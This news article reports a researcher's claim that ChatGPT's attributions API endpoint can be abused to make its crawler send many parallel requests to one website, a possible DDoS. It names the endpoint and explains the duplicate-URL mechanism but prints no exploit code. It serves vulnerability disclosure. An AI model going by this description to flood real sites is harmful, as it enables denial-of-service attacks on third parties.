Customize Consent Preferences

We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.

The cookies that are categorized as "Necessary" are stored on your browser as they are essential for enabling the basic functionalities of the site. ... 

Always Active

Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.

No cookies to display.

Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.

No cookies to display.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.

No cookies to display.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

No cookies to display.

Advertisement cookies are used to provide visitors with customized advertisements based on the pages you visited previously and to analyze the effectiveness of the ad campaigns.

No cookies to display.

OpenAI’s ChatGPT Crawler Can Be Used to Trigger DDoS Attack on Websites, Researcher Claims

Share

OpenAI’s ChatGPT application programming interface (API) has a vulnerability that can be exploited to initiate a distributed denial of service (DDoS) attack on websites, according to details shared by a cybersecurity researcher. The chatbot can reportedly be used to send thousands of network requests to a website using the ChatGPT crawler. The researcher claims that the vulnerability, which was given a high severity rating, is still active with no response from the company on when the issue will be fixed.

ChatGPT API Allows Multiple Parallel Network Requests to Same Website

In a GitHub post shared earlier this month, Germany-based security researcher Benjamin Flesch detailed the vulnerability that exists within the ChatGPT API. The researcher also posted code for a proof of concept that sends 50 parallel HTTP requests to a test website, revealing how the bug can be used to trigger a DDoS attack.

According to the Flesch, the vulnerability surfaces when handling HTTP POST requests to https://chatgpt.com/backend-api/attributions. It is a method to send data to a server, typically used by the API endpoint to create new resources. While executing this function, the ChatGPT API requires a list of hyperlinks in the URL parameter.

In what appears to be a flaw in its API, OpenAI does not check whether a hyperlink to the same resource appears multiple times in the list, according to the researcher. Since hyperlinks to a website can be written in different ways, this results in the crawler sending multiple parallel network requests to the same website. Additionally, Flesch claims OpenAI does not enforce a limit on the maximum number of hyperlinks that can be added to the URL parameter and sent in a single request.

As a result, a malicious actor can potentially send thousands of hits to a website, which could quickly overwhelm its server. The security researcher gave this vulnerability a high severity “8.6 CVSS” rating since it is network-based, has low complexity in execution, and requires no privileges or user interaction but can cause a high impact on availability.

Flesch claimed to have reached out to both OpenAI and Microsoft (as its servers host the ChatGPT API) about the vulnerability multiple times via different channels after discovering the bug in January. He claimed that he reported it to the OpenAI security team, OpenAI employees via reports, the OpenAI data privacy officer, as well as Microsoft’s security and Azure network operations team.

Despite making several attempts to flag the vulnerability, the researcher claimed that the issue is neither resolved nor has the AI firm acknowledged its existence. Gadgets 360 staff members were not able to verify the presence of the bug on the chatbot.